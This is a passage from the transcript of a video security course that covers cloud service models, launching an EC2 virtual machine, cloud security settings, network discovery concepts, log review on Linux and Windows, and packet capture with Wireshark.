And you've got a network connection that you need to have up and running to get to those services. So we
either connect over the Internet or through a dedicated leased line which doesn't use the Internet from our on-
premises network to the cloud. We could also have a site-to-site VPN, essentially a VPN tunnel, between our
network and the public cloud provider. Certainly, we should have redundant Internet connections. For instance,
if we're using the Internet, in case one connection goes down, we still need to be able to make a connection to
our IT services running in the cloud in some other way.
Then there is data replication. Now we could replicate data within provider data centers. This is common with
public cloud providers. For redundancy and availability of your data, they're replicated between different data
centers and, in some cases, even between different regions within a country that you may or may not pay an
extra fee for that redundancy, it really depends on the cloud provider. But that is an option. Now this provides
high availability. The other aspect related to this is that we – as IT and server people for on-premises networks
– we can also configure replication from on-premises data sources to the cloud as well for high availability.
That could also be in the form of cloud backup. In this video, we discussed cloud concepts.
Upon completion of this video, you will be able to recognize the use of cloud service models.
Objectives
[Topic title: Cloud Service Models. The presenter is Dan Lachance.] In this video, I'll discuss cloud service
models. With cloud computing, as we've mentioned, we're really just using technology that we've had for a
while in a different way. And that's where the whole service model kicks in. With cloud computing, we pay as
we go. We have metered usage. This also applies to private clouds. We have departmental chargeback we
might use within an organization for IT service consumption by different departments within the company. So
it's a metered usage, meaning it's like electricity or water. You pay only for what you use. So, as a result, it's
important that you stop, disable, or delete deployed resources in the cloud when you aren't using them. Billing
might continue otherwise – you're going to pay more than you really need to. And, also at the same time,
because you've got more out there and more running that isn't necessary, it increases your attack surface.
The SLA is the service-level agreement. This is a contractual document between a cloud service provider and a
consumer that guarantees things like uptime, response time – which could relate to, for example, how quickly
your web site hosted in the cloud responds. It also could relate to how quickly tech support from the cloud
provider responds when there is an issue. Those types of things are what you will see within a service-level
agreement. [The aws.amazon.com web site is open. In this, the Amazon EC2 Service Level Agreement web
page is open.] For example, what you're seeing here is the Amazon Web Services EC2 Service Level
Agreement.
Now EC2 is used to deploy virtual machines into the Amazon cloud. So, as I scroll through the service-level
agreement, I can see the Service Commitment, the definition of terms, and any credits that might be provided
to consumers when Amazon Web Services doesn't keep up with their end of the agreement. There are many
different categories of cloud service models. Here we'll just talk about the three big ones – beginning with
Infrastructure as a Service or IaaS.
This means that the cloud provider has little management responsibility, it's on you – the cloud consumer –
because you might deploy things like virtual machine. So it's up to you what you call them and that they are
accessible that they have the correct network addresses and so on. The same goes for things like virtual
networks or cloud storage that you use in the cloud environment. It's up to you to deploy it correctly and to
determine what you need and how it should be configured. Platform as a Service, or PaaS, has some
management responsibility on the cloud provider, the rest is on you – the consumer. This is primarily used by
developers where there are developer tools, like web and worker roles for web apps, message queues where
one application component can drop a message that gets read by another component when the other component
is available instead of relying on it in real-time. That's called loose coupling when it comes to development.
Then there are database instances, like Microsoft SQL Server or the open-source MySQL, that you might
deploy in the cloud on Platform as a Service. Software as a Service or SaaS means that the cloud provider has
the most management responsibility compared to the other models like Infrastructure as a Service and Platform
as a Service.
So think of Google Apps, Office 365 – where, essentially, it's up to the cloud provider to keep those patched
and up and running. We just use those applications in the cloud, save our data. And that's pretty much our
responsibility as cloud consumers. In this video, we discussed cloud service models.
After completing this video, you will be able to recognize the role of virtualization in cloud computing.
Objectives
[Topic title: Virtualization. The presenter is Dan Lachance.] In this video, I'll demonstrate how to work with
operating system virtualization. These days you can work with virtual machines either on-premises – so with
the equipment that is owned by you or your organization that is completely under your control – or you can
deploy virtual machine instances into the cloud on cloud provider equipment. Let's start with on-premises.
Here, I've got VMware Workstation. [The VMware Workstation window is open. Running along the top of the
window, there is a menu bar with several menus such as File, Edit, and View. Below the menu bar, several
tabs are open such as Home, Srv2012-1 - Server+, and Windows 10. The Home tab is selected by default. The
vmware Workstation 10 section is open in the Home tabbed page. It consists of several links such as Create a
New Virtual Machine, Open a Virtual Machine, and Virtualize a Physical Machine.]
Now there are many other virtualization tools you might be using like VirtualBox or Microsoft Hyper-V and so
on. However, notice here in VMware Workstation, if I were to click the Create a New Virtual Machine
link, [Dan clicks the Create a New Virtual Machine link. As a result, the New Virtual Machine Wizard
opens.] it starts a wizard where I'm asked questions about where the installer file or disc is for the operating
system. Here, I'll just leave it on I will install the operating system later. Then I'm asked which flavor of the
Guest operating system it will be – Microsoft Windows, Linux, Novell NetWare, Solaris, UNIX, and so on.
And, as I proceed, I get to give it things like a name, a storage location, and so on. Now we can also deploy
virtual machines [He clicks the Cancel button of the New Virtual Machine Wizard.] in the cloud very quickly.
And, of course, we only get charged for what we're using while the virtual machine is running. Here, for
example, I'm using Amazon Web Services in the public cloud, [The amazon.com web site is open. In this, the
AWS Management Console web page is open. The presenter is logged in his account. Running along the top of
the web site, there are several drop-down menus such as AWS, Services, and Edit. The Amazon Web Services
section is open. It contains several subsections such as Compute, Developer Tools, and Management
Tools.] but I just as well could be using Rackspace or Microsoft Azure.
Here I'm going to go click on EC2, [In the Compute subsection, he clicks the EC2 option.] which is what is
used for virtual machines launched into the Amazon Web Services cloud. Now what I want to do in this
console is click on Instances on the left. [The EC2 Dashboard is open. It is divided into two sections. The first
section is a navigation pane. The second section displays the information on the basis of the selection made in
the first section. The navigation pane includes several expandable nodes such as INSTANCES, IMAGES, and
ELASTIC BLOCK STORE. In INSTANCES expandable node, he clicks the Instances option.] This should
show me any virtual machine instances I've already deployed in the cloud. Now, if I don't have any, of
course, [Due to the selection of Instances option, the second section displays its information. It includes two
buttons: Launch Instance and Connect. Adjacent to them, there is the Actions drop-down menu.] I can click
the Launch Instance button to do that. So, essentially, what I'm doing is building a virtual machine to a web-
based interface. [After clicking the Launch Instance button, a page opens which is titled Step 1: Choose an
Amazon Machine Image (AMI). It is divided into two sections. The first section is a navigation pane in which
Quick Start option is selected by default. Due to the selection made in the first section, its information is
displayed in the second section. The second section displays several virtual machine templates.] Here I've got
a gallery of essentially virtual machine templates for various Linux distributions. And, as I go further and
further down, I can see various Windows server operating systems that I can use when deploying a virtual
machine in the cloud. I can also click on the AWS Marketplace link on the left [He clicks the AWS
Marketplace option from the Navigation pane.] and search up specific virtual machine templates essentially
that might have applications preconfigured or virtual appliances – like for network-attached storage and so on.
So, in this case, what I'm going to do is go back, do Quick Start, and I'll just choose Amazon Linux [He clicks
the Quick Start option in the navigation pane. Then from the second section, he selects the first virtual
machine template titled: Amazon Linux AMI 2016.03.3 (HVM), SSD Volume Type. He clicks the Select button
which is adjacent to this template.] and I'll just click Select. And, just like building a virtual machine on-
premises, it's going to ask me a number of questions. In this case, it wants to know the sizing type – in other
words – how many virtual CPUs or vCPUs, how much RAM, and so on. [Now a page opens which is titled
Step 2: Choose an Instance Type. It contains two drop-down menus: All instance types and Current
generation. Below them, there is a table of various available instances. The information displayed for every
instance is: Family, Type, vCPUs, Memory (GiB), Instance Storage (GB), EBS-Optimized Available, and
Network Performance.]
I'm just going to accept this and go to the next step [He clicks the Next: Configure Instance Details button. As
a result, a page opens which is titled Step 3: Configure Instance Details.] where I can determine which virtual
network in the cloud I want this to be deployed into, [The Configure Instance Details page opens which
includes several fields such as Network, Subnet, Auto-assign Public IP, and IAM role.] and whether it should
have a public IP address – I'm going to Enable that option. [He clicks the drop-down list box which is adjacent
to the Auto-assign Public IP field. He selects the Enable option.] So I'm just going to click the Review and
Launch button in the bottom right. [Now a page opens which is titled Step 7: Review Instance Launch. It
includes sections such as AMI Details and Instance Type. The page contains Cancel, Previous, and Launch
buttons.] I'll click the Launch button. Now, in the cloud, [The following dialog box opens: Select an existing
key pair or create a new key pair.] what's interesting about this specific cloud provider is that I have to create
– or in this case – choose an existing key pair that will be used to authenticate to that virtual machine. So I'm
going to acknowledge that I've got the private key portion that will allow me to authenticate. So then I would
just click Launch Instances. And, at this point, it's launching that virtual machine – in this case, it's using
Amazon Linux in the cloud. [The page titled Launch Status opens. It includes the following section: Your
instances are now launching. This section contains the following link: i-fb167b03.] So I can go ahead and
click on the link for that and see how it's doing. So it's very quick and easy to launch a virtual machine into the
cloud. It's equally as easy in the future to remove it or stop it. [The section corresponding to the Instances
option opens again. It contains two buttons: Launch Instance and Connect. Adjacent to them, there is the
Actions drop-down menu. Below this, the download status of the following Instance ID is displayed: i-
fb167b03. Below this, its information is displayed. The information contains the following tabs: Description,
Status Checks, Monitoring, and Tags. The Description tab is selected by default.] So, having a virtual machine
selected, I can go to the Actions button here, and under Instance State, I could Stop it or Terminate it – which
means delete it. [He clicks the Actions drop-down menu. Then a list of options appears, he refers to the
Instance Settings option. On clicking it, a flyout menu appears which includes options such as Stop and
Terminate.]
Now you want to make sure that you stop any cloud services when you no longer need them because
depending on the provider, you'll still be charged. So you don't want to leave virtual machines running for
months because you're still going to be paying for that usage even if you're not actually using them. Notice,
here at the top, I've got an option to connect to the selected virtual machine. So, when I click Connect – in this
case, because it's Linux, [He clicks the Connect button at the top. As a result, the Connect to Your Instance
dialog box opens. He refers to the options in the following field: I would like to connect with.] I can do it using
a standalone SSH client like PuTTY or I could use a Java SSH client in my web browser. Now I don't have to
do it this way. For example, I could simply use the free PuTTY tool to make a connection from my local
station over the Internet [He closes the Connect to Your Instance dialog box.] to that virtual machine in the
cloud, which we are going to do.
Now, before I do that though, I need to take note of either the Public DNS name down here or IP address of
this host. [Under the Description tab, he refers to the Public IP of the Instance ID.] I'm going to Copy the
Public IP address. Here, on my Windows station, I've downloaded and run the PuTTY tool [The PuTTY
Configuration dialog box is open.] where I've put in the public IP address of my cloud virtual machine. I'm
connecting over Port 22. [The dialog box is divided into two sections. The second section is titled Basic
options for your PuTTY session. He refers to the entries filled in the second section.] Because it's a Linux host,
so I want to SSH to it. And I've also gone down here under Connection - SSH - Auth on the left [In the first
section, he clicks the Auth subnode which is under SSH subnode. And the SSH subnode is under the
Connection node.] and enabled agent forwarding because it requires public key authentication. I've already
loaded my private key to be able to do that. So now I would click Open. And, of course, it asks me to login.
So, in this particular case, I know the username that is required to authenticate, [The following window opens:
ec2-user@ip-10-0-0-186:~. In this, he types the following: ec2-user.] and I'm in. I am now logged in to my
Linux cloud-based virtual machine. In this video, we learned about server virtualization.
[Topic title: Cloud Security Options. The presenter is Dan Lachance.] In this video, I'll talk about cloud
security options. One of the big showstoppers with cloud computing adoption is trusting a third party to deal
with, perhaps, sensitive data or IT systems. And, in some cases, due to legal or regulatory reasons, you can't
use public cloud providers, you've got to deal with on-premises storage and running of IT systems.
The first thing to consider is are public cloud providers hacking targets? Because there are thousands of tenants
sharing pooled IT resources. So aren't they a bigger target? Well, to a degree, there is some truth in that. But, at
the same time, with public cloud providers, economies of scale – because they have so many customers –
allow them to focus on strong security. It's in their interest because that's their business. And they also have to
go through third-party audit compliance constantly to make sure that their IT practices and systems are
hardened and trustworthy. There is also replication, both, within and between different provider data centers.
This allows for high availability of IT systems as well as data. So it's part of business continuity to keep
business operations running even if we have an entire data center that's not reachable for some reason.
Then there is encryption of data in motion, data being transmitted over the network. Now that needs to be
done, of course, over the Internet, but also internally on internal networks or even private cloud networks
where you might deploy virtual machines that talk to each other only within that cloud virtual network. Data at
rest means that we've got stored data that should also be encrypted. Now we might have to manually encrypt
data before we store in the cloud or it might be available from the cloud provider. In this example, I am going
to upload a file to a cloud storage location. [The amazon.com web site is open. In this, the S3 Management
Console web page is open. Running along the top of the page, there are drop-down menus such as AWS,
Services, and Edit. Below this, there are buttons: Upload, Create Folder, None, Properties, and Transfers. The
None button is selected by default. Also there is an Actions drop-down menu adjacent to the Create Folder
button.] So here I'm just going to go to the Actions menu. And I'm going to choose Upload.
Now, once I've added a file to upload here, it's just a small text file. [The Upload - Select Files and Folders
wizard is open. Dan refers to the following file that he had added for upload: Project_A.txt. The wizard also
contains the following buttons: Set Details, Start Upload, and Cancel.] As I go through the wizard – here I'm
going to click Set Details at the bottom – notice I have the option to Use Server Side Encryption. [On clicking
the Set Details button, the section now contains several radio buttons and a checkbox. The Use Standard
Storage radio button is selected by default. He checks the following checkbox: Use Server Side Encryption.
Under this, the following radio button is selected by default: Use the Amazon S3 Service master key. The
wizard now contains the following buttons: Select Files, Set Permissions, Start Upload, and Cancel.] So this is
one way that we can deal with cloud encryption for data at rest. We also will have to think about the cloud
provider and how they remove data.
Now of course, we can remove data stored in the cloud ourselves, but other data remnants that are still
available after the fact. They have many specific data sanitizing practices they use to make sure when we
delete data, nobody else can get to it. Then there are virtual machines in terms of security, where we might
configure them such that data center administrators can only start or stop virtual machines that we create or
perhaps even not. That would depend on your cloud provider and how you structure your virtual machines and
also what the provider supports. There is this concept called shielded virtual machines whereby the contents of
the virtual machine – running services and data – are completely inaccessible by data center administrators. All
they can do is essentially stop the VM.
Virtual networks are similar to creating a real network on-premises except it's done in the cloud on provider
equipment. So this is a network segment created in the cloud. We can also apply firewall rules for both
inbound and outbound traffic. Ideally, you want to configure those rules if they're not already done this way to
deny all traffic by default. You can poke holes in that firewall for only what is needed. Whether you are using
Microsoft Azure, Rackspace, or – in this case – Amazon Web Services, they all have similar options. [The
amazon.com web site is open. In this, the VPC Management Console web page is open. In this web page, the
VPC Dashboard is open. The page is divided into sections. The first section is a navigation pane which
includes options such as Virtual Private Cloud and Security. Under the Virtual Private Cloud, the Your VPC's
suboption is selected by default. The second section displays the information on the basis of the selection made
in the first section. The second section contains a Create VPC button and an Actions drop-down menu. Below
this, it shows the status of the following VPC: PubVPC1. Its information is displayed below. The information
includes three tabs: Summary, Flow Logs, and Tags. The Summary tab is selected by default.] For example,
here I've got a PubVPC1 or a virtual private cloud. This is just a virtual network in the cloud.
Now, if I select it, down below under the summary area to the right, there is a network access control list or
network ACL for this network I've deployed in the cloud. And, if I click on the link for it, it opens up a new
window. And here I can control both inbound and outbound traffic – so traffic coming in to this network in the
cloud or leaving. [A second tab opens in the web browser. The amazon.com web site is open in it. In this, the
VPC Management Console web page is open. In this web page also, the VPC Dashboard is open. The second
section now contains a Create Network ACL button and a Delete button. The information of the following
Network ACL ID is displayed: acl-2b85aa4c. Below this, there are several tabs such as Summary, Inbound
Rules, and Outbound Rules. He clicks the Inbound Rules tab.] So I'm going to select the ACL from the list.
Down below, if I click Inbound Rules, I can see the rules that ALLOW traffic from certain locations or DENY
it. Of course, I could click the Edit button. And, if I really wanted to, I could add new rules. If I click Add
another rule, [He clicks the Add another rule button.] I can choose whether I want it to be for SMTP (25), SSH
(22), ALL Traffic, ALL TCP, ALL UDP, and so on and so forth. [He clicks the Search bar below the Create
Network ACL button and refers to the options that appear on clicking it.] I can also determine the port or Port
Range and the Source IP address or network from which the connection comes from. Now that's Inbound
Rules. In the cloud, regardless of cloud provider, we can also control traffic leaving a network that's deployed
in the cloud. So there are outbound rules here down under the Outbound Rules tab.
Cloud computing implies virtualization whether we, as cloud customers, make the virtual machines ourselves
or whether they're built when we run some kind of a wizard for some cloud service. Virtual machines can be
created in the cloud from provider template galleries for a quick and easy deployment or you can manually
create virtual machines in the cloud yourself. You can even migrate existing on-premises virtual machines to
the cloud to reuse your investment that you have already spent in building VMs on premises. Now, when it
comes to hardening, you follow standard operating system hardening guidelines. There really is nothing
different about hardening of virtual machine in the cloud than there would be for a server you're hosting within
your own office network or your own data center. So things like following the principle of least privilege,
applying the latest software patches, reducing the amount of services, changing default configurations – that
stuff doesn't really change whether you are talking about a virtual machine in the cloud, the public cloud or a
physical server or a virtual machine running on-premises in your control.
Now cloud management interfaces normally use HTTPS. Normally, we administer our cloud services through
a web browser interface that's secured. We might also consider enabling auditing of activity. So we contract
who deployed or deprovisioned what in the cloud and when. We can also use role-based administration so that
we might assign a role with permissions to certain users so they can do only what is required to get the job
done. Again, that adheres to the principle of least privilege. In this video, we discussed cloud concepts.
Table of Contents
After completing this video, you will be able to explain how to discover network devices.
Objectives
[Topic title: Topology, Service Discovery, and OS Fingerprinting. The presenter is Dan Lachance.] In this
video, I'll discuss topology, service discovery, and OS fingerprinting. Network intrusions always begin with
reconnaissance performed by the bad guys. This includes mapping out the network layout – so how the
network is laid out and also the devices and where they are laid out within that network infrastructure.
Documentation is used by the network owners and network technicians as a means of effective
troubleshooting. The more we know about how a network is laid out and where things are and what their
addresses are, what their names are, the better we are at troubleshooting and quickly resolving issues. But, if
that documentation falls into the wrong hands, it makes it very easy for them to start trying to exploit
vulnerabilities that might exist. So this documentation, aside from troubleshooting, also allows the network
owners and network technicians to squeeze the absolute most performance out of what they have because they
can visualize where things are, how they're working, and optimize network links and network services and so
on.
Now, when we talk about discovering devices on a network through reconnaissance, that can happen in many,
many ways. One of those ways is through a Layer 2 type of discovery. Now Layer 2 of the OSI model is the
data-link layer where we might be able to discover things at the hardware layer on the local network only. So
things like MAC addresses come to mind when we talk about Layer 2. Layer 3 discovery can go outside of the
boundary of a local area network because Layer 3 – if you recall – of the OSI model is the network layer. It
deals with things like routers and routing of traffic from one network to another. And, at the software protocol
level, it deals with things like IP addresses.
SNMP is an old protocol – the Simple Network Management Protocol. And what's interesting about it is that
network devices use some kind of an SNMP agent that listens on UDP port 161. Now not every device will
have this SNMP agent listening, but often it is running automatically – whether we are talking about a software
appliance or even a hardware appliance on the network. Now the agent is listening on UDP port 161. We need
an SNMP server-side component that queries that SNMP agent on devices and looks through the MIBs on the
device. A MIB is a management information base that contains different types of information about that
specific device type. So, for example, if it's a network switch, we might have a MIB that shows us how
VLANs are configured, which devices are connected to which ports, how many devices are connected, amount
of traffic into and out of the switch as a whole or each port – that type of information. Topology discovery,
aside from SNMP, can also occur by querying centralized resources on the network, like DHCP servers. DHCP
servers hand over to IP configuration for client devices. That would be a great way to learn about what's on a
network if you can query the DHCP server and get a list of active leases and details related to that. Then there
is also querying DNS servers where we could query for many types of records, including A for IPv4 and quad-
A records for IPv6. So we can learn of names of devices, names of hosts, and their corresponding IPs.
Now knowing the name of something can sometimes imply what it is – you know, like HR, payroll server one
is pretty indicative of what it is. And, if we find that DNS easily, we can also find the IP address for it. Now,
ideally, you're not going to be able to find that type of information in a public DNS server on the Internet. But,
if a malicious user can somehow get onto your internal networking query, internal DNS servers, they very well
could find that type of information out. So it takes one thing away from what they have to learn to get into HR,
payroll servers.
Topology discovery can also be done by querying other types of devices like routers – where routers maintain
information about network links that they are connected to. Routers also have memory – just like switches do,
just like servers do, and so on. On a router, the memory is used to store routing table entries. So it uses this
when it receives an inbound packet from an interface to determine the best way to route it through another
interface to some remote network somewhere. Then there are other routers that each router will communicate
with using various protocols like the Cisco Discovery Protocol, CDP. That's a Layer 2 protocol used to
discover other types of devices and information about them – specifically routers on the same network link.
Then for Juniper systems, there is Juniper Discovery Protocol, or JDP.
Switches maintain information about their connected devices and how VLANs are configured. So, if a
malicious user can somehow do reconnaissance against a switch maybe because there is a simple password to
remotely connect to it through SSH...or heaven forbid, we are using telnet to connect to a switch, which means
an attacker simply has to capture a valid user connecting to the switch and provide in their credentials because
telnet doesn't encrypt or even encode anything. Then another way to discover items on the network is through
Address Resolution Protocol cache discovery. Address Resolution Protocol or ARP is part of TCP/IP. And it's
used to basically resolve IP addresses to hardware MAC addresses on a local area network. So it can be used to
discover other active devices by looking at the ARP cache on each and every device. For example, on a
Windows machine at the command prompt, I could type "arp -a" to list all ARP cache entries. What we're
seeing here are our different interfaces – so I've got three interfaces listed here. I can see the IP address for the
interface, I can see the IP addresses stored in the ARP cache in memory on this device, as well as the
corresponding physical MAC addresses.
Now, for a malicious user to do something terrible on a network, we said that part of what they have to do is
learn about what's there. And this is yet another way that an attacker could learn about things like IP addresses
and MAC addresses. Essentially, the more an attacker knows about our network and what things are called,
what their addresses are, what they are running, what ports things are listening on, the more well equipped they
are to start looking for vulnerabilities. Of course, attackers can conduct network scans if they can get on the
network in the first place. They could scan for open ports to get a sense of what types of network services are
out there. So, for example, if they get a response on a number of devices for TCP port 80, they know that those
are web servers. So they might then further their energies on those devices to see what type of web servers and
if there are any known vulnerabilities and what version of the web server they are running and so on. Ping
sweeps can also be conducted to see what kind of a response we get on the network, so we know which
devices are out there. And, in some cases when you do a network scan, you might have to specify credentials.
Now this would be done by the good guys. If you are doing some kind of an audit or penetration test or if you
are just conducting a network scan of your own network, you might put in credentials that will allow you to
authenticate devices on the network and see what's running. Otherwise, the bad guys – essentially malicious
users is really what we mean – would be running noncredentialed scans. Depending on how hardened your
user accounts and passwords are, we'll determine how successful they are with a noncredentialed network
scan. We'll be conducting network scans in various ways in different demonstrations in this class. You might
also have an import file that already contains network topology and device information that you import – so
you could see a network layout, it might be in CSV or XML format. Now this is great for the owners of the
network. But, if it falls into the wrong hands, it's a problem. Service discovery can be manual, where clients
are statically configured to discover various network servers, but the way things go these days is we normally
have a centralized service location server.
In this case, DNS could serve that role where we've got service location records that contain hostname
information and port information. This is actually what gets used by Windows devices to find Active Directory
domain controllers. There are centralized service registries where network services add themselves when they
initialize and clients can discover services by querying this centralized service registry. And, again, this is how
DNS service location records are really treated. A directory service, like Active Directory, can serve as a
service registry. So it's important that we secure this since it could be a central repository of services available
on the entire network. The last thing we'll mention here is operating system or OS fingerprinting. This allows
us to identify a remote operating system running on a device elsewhere over the network.
Now one way this can be done is by analyzing network packets sent from a particular OS that each have their
own way of formulating certain types of packets. They put certain values in certain packet header fields. For
example, the TTL, or Time to Live field, is part of an IP packet header. It refers to the amount of time in
milliseconds before a packet is discarded or a timeout occurs. Now there are different TTLs for different
operating systems. For example, a Juniper device would use ICMP type 64 for the TTL. The Windows 7
operating system would set the TTL, the time to live, to 128 – that would be the number of routers that traffic
can go through, or the packet can go through rather, before it gets discarded. It gets decremented by one for
each router it goes through. Most Linux kernels like 2.4 would set the TTL to 255. [A Mac OS X would use
TCP type 64 for TTL.] In this video, we discussed topology, service discovery, and OS fingerprinting.
Find out how to use logs to learn about the network environment.
Objectives
[Topic title: Reviewing Logs. The presenter is Dan Lachance.] In this video, I'll talk about the importance of
reviewing logs. Logs provide a wealth of information for IT technicians, especially for troubleshooting. But, at
the same time, logs can also provide a wealth of information for curious or malicious users. There are different
types of logs. The first is operating system logs, which will log both good events as well as warning or critical
types of events and, again, crucial for troubleshooting. In the same way, we can have application-specific logs.
We can have auditing logs to track activity for either regular users opening sensitive files or perhaps for other
administrators creating user accounts. Of course, there are also firewall logs where we can track activity or
sessions or even individual packets coming in through the firewall or those that were dropped because they
don't match a firewall rule that allows the traffic.
Individual log entries include many different things including date and time; the host related to that event,
which could be either an IP address or a hostname or perhaps both as well as username information if
applicable; an event ID, which is normally a numeric value that specifically ties to that type of event, so if it
occurs again, it gets the same event ID; and also of course, some kind of an event description. When it comes
to edge devices...and what we're really talking about here are things like VPN appliances, wireless access
points, routers, [Network switches] and so on. These types of devices and their logs should be kept separate. In
other words, those edge devices should forward those logs to a different secured host on some other secured
network because if the device is compromised, so are the logs.
Now, at the same time, this is separate from edge devices forwarding authentication requests to a central
RADIUS server. We're talking about log information being stored elsewhere. Now edge devices should not be
storing logs locally. Or, if they do, there should be another copy elsewhere. But they should also not be
performing authentication locally. And that's where the whole forwarding authentication requests to
centralized RADIUS server is very much a big deal. There is a high probability of edge device compromise.
And this is why we want to make sure logs and authentication are handled elsewhere because these edge
devices – not always, but in many cases – are public facing. They are reachable from the Internet.
In Linux and UNIX operating systems, we can use the older Syslog or the newer syslog-ng, where ng stands
for next-generation, daemon. The purpose of this daemon or this network service is to deal with logging either
on the local UNIX or Linux host, but it can also send or forward specific log entries that you filter out to
another location as well. It can receive them from other Syslog or syslog-ng daemons. So we can specify these
specific log sources where the log ID is coming from and these specific events of that type that we want to
send elsewhere. Windows can do the same thing. We can build event subscriptions and then filter the events
that should be forwarded to other hosts. And it makes a lot of sense in a large network.
Even if you're just dealing with desktop computers or Windows servers or Linux servers, instead of having to
review the logs on each and every device, it's kind of a nice way to kind of have a centralized location where
you have all the log entries that would be of relevance – for example, maybe only error or critical or warning
log entries on one host. And maybe, as you sip your morning coffee, that's where you go to check the latest log
entries. Here in Linux, [The following terminal window is open: root@Localhost:/var/log.] if we take a look at
the current working directory with pwd [Dan executes the following command: pwd. The following output is
displayed: /var/log.] – print working directory – we can see we're looking at /var/log. This is where most
Linux distributions store various types of log files. If I type ls to list the contents, I can see both files listed here
in black text as well as folders containing logs for certain items like cups – the Common UNIX Printing
System – and so on. So for example, if I already use the cat command to display the contents of the secure
log, [He executes the following command: cat secure.] I see information related to authentication and
passwords that succeeded and so on. At the same time, if I were to clear the screen and then use cat against the
main Linux system log messages, [He executes the following messages: cat messages.] I can see all of the
details related to the main operating system kernel that's been running and the messages that it reports. And, of
course, if I really want to, then I can go ahead and filter that log. So for example, I can type cat messages and I
can pipe that using vertical bar symbol, let's say, to grep and maybe we will do a case insensitive line matching
for vmware. [He executes the following command: cat message | grep -i vmware.] And here I can see
VMware-specific related items in that log file.
Here, in Windows Server 2012 R2, we can fire up the Event Viewer. [The Event Viewer window is open. It is
divided into three sections. The first section is a navigation pane. In which Event Viewer (Local) node is
selected by default. It includes folders such as Custom Views and Windows Logs. The second section displays
the information on the basis of the selection made in the first section. The second section includes the
following subsections: Overview, Summary of Administrative Events, Recently Viewed Nodes, and Log
Summary. The third section is titled Actions which includes the Event Viewer (Local) expandable node.] And
from here, for instance, in the left navigator, I might expand Windows Logs and look at the main System log
file [In the navigation pane, he clicks the Windows Logs folder. On clicking it, several options appear, he
clicks the System option.] with all of its entries. So, once they pop up over here on the right, I'm going to see a
series of columns that I could also sort by. Maybe I want to sort my log entries chronologically or by the
Source or by the Event ID. [On selecting the System option, its content gets displayed in the second section.
The second section displays the number of events in a tabular format. The following are the column headers:
Level, Date and Time, Source, Event ID, and Task Category. On selecting any entry from the table, its
information gets displayed below the table. There are two tabs below the table: General and Details.] So, for
example, maybe what I'll do here is sort by the Level column. So all my informational messages are listed at
the top. If I click it again, then it would sort it again. And I could see all of my critical and warning items listed
at the top. We'll just scroll back up here and so on. So, as we scroll through the log, we can see the types of
information listed here. If I select on a specific log entry, so I will just double-click on it, it pops up the details
– shows me when it was logged, [He double-clicks an entry in the table. As a result, the following dialog box
opens: Event Properties - Event 7036, Service Control Manager.] the Event ID number, which I could search
up online, and so on.
Now, from a security perspective, [He closes the dialog box.] yes, all logs are important. But we might also be
especially interested in the Security log here [In the navigation pane, under the Windows Logs folder, he clicks
the Security option.] in Windows, where any audit events...if we are auditing logon attempts, whether they fail
or succeed or file access, we're going to see entries listed here for auditing. [He refers to the number of
auditing events which are displayed in the tabular format in the second section.] Of course, at the same time,
we can right-click on a log in the left-hand navigator and we could Filter Current Log. [In the navigation pane,
he right-clicks the Security option. As a result, a shortcut menu appears from which options can be selected.
He selects the Filter Current Log option.] So we could say, for instance, "I only want to see Critical errors. I
only want to look at certain Event sources or certain Event IDs". [The Filter Current Log dialog box opens. It
contains two tabs: Filter and XML. Under the Filter tab, there are several fields such as Logged, Event Level,
and Task Category.] So for example, I might look for Critical, Warning, or Error items here in Security log,
I'll just click OK. [In the Event level field, he checks the following checkboxes: Critical, Error, and Warning.
Then he clicks the OK button.] And, after a moment or two, it will filter it out. And any log entries that do
meet those conditions will be listed. So, of course, I could choose something here. [In the second section, for
the Security option, the Number of events are displayed in a tabular format after applying the Critical, Error,
and Warning levels.] And I could see the details by double-clicking and reading that log entry.
Now, if I really wanted to configure log forwarding – in this case, in Windows – that's where I would go to my
event Subscriptions [In the navigation pane, he selects the Subscriptions folder. As a result, the Event Viewer
pop-up box appears in the second section.] where it tells me to start the Event Collector Service. And then,
from there, I could right-click and Create Subscription where we would do things [In the navigation pane, he
right-clicks the Subscriptions folder. As a result, a shortcut menu appears from which options can be selected.
He selects the Create Subscriptions option. Then, the Subscription Properties dialog box opens which includes
fields such as Subscription name, Description, and a drop-down list box named Destination log. It also
contains the following section: Subscription type and source computers. It contains the following radio
buttons: Collector initiated which is selected by default, and Source computer initiated. There is the Select
Computers button adjacent to the Collector initiated radio button.] like Select Computers I want to reach out
to and grab log information from. And then, of course, I could filter the evens down here in the bottom right by
clicking Select Events. [He clicks the Select Events drop-down list box.]
Now, when I do that, I get to choose the event types [The Query Filter dialog box opens. It contains the Filter
and XML tabs. The Filter tab is selected by default. Under the Filter tab, there are several fields such as Event
level, Event logs, and Event sources.] – Critical, Warning, Error, Information, and so on. And I could further
filter it by event log types – maybe only certain logs I'm interested in – Event IDs, Keywords, and so on.
The last logging item to consider is log rotation so that as log files become full, new logs get created while we
retain a history of the older logs. So we can have different log rotation settings that apply to individual logs.
We can do it in Windows, we can do it in Linux and UNIX. Then there is log retention, which might be
required for regulatory compliance, but we also have to think about how much disk space will be used by
archived logs. This might be a case where we actually choose to archive something long term in the cloud. In
this video, we discussed how to review logs.
[Topic title: Packet Capturing. The presenter is Dan Lachance.] In this video, I'll talk about packet capturing.
Packet capturing can be used by either legitimate users or malicious users for a variety of reasons, including
the establishment of a network traffic baseline. So, by capturing a large enough amount of traffic, we can
establish what is normal in terms of network traffic patterns. We can also capture traffic and then use it to
troubleshoot network performance issues, such as if we have a jabbering network card that is sending out
excessive traffic or if we are getting a lot of network broadcasts that we don't think should be on the network,
we can check out the source. So we use packet capturing then to monitor network traffic. It can record traffic
and save it to a file for later analysis. And, in some cases, some packet capturing tools allow you to replace
contents within fields, within headers of the packet, or in the payload and then send it back out on the network
again. Now, when we're capturing network traffic, we're talking about capturing it whether it's on a wired
network or wireless.
There are numerous packet capturing tools available. Some are hardware-based where we can use rule-based
traffic classification. Also, the ability to send packets to a different interface is an option, the ability to drop
packets that we aren't interested in. Now that could also be useful for mitigating things like denial-of-service
attacks. It might not be just that you are not interested in capturing or recording that traffic, but it's suspicious.
And you don't want to have any part of it. At the software level, there are numerous applications out there to
capture network traffic and to perform analysis. Wireshark is one. In UNIX and Linux environments, we can
also use the tcpdump command.
Here in Wireshark, [The Wireshark Network Analyzer window opens. Running along the top of the window is
a menu bar. Below this, there is a toolbar.] if I click the leftmost icon in the toolbar, [The Wireshark: Capture
Interfaces window opens. A list of interfaces appears. Each interface has the following buttons adjacent to it:
Start, Options, and Details.] I can choose from the list of interfaces which one I want to capture network
traffic on. So I see, in my second interface here, I've got a number of packets going through that interface.
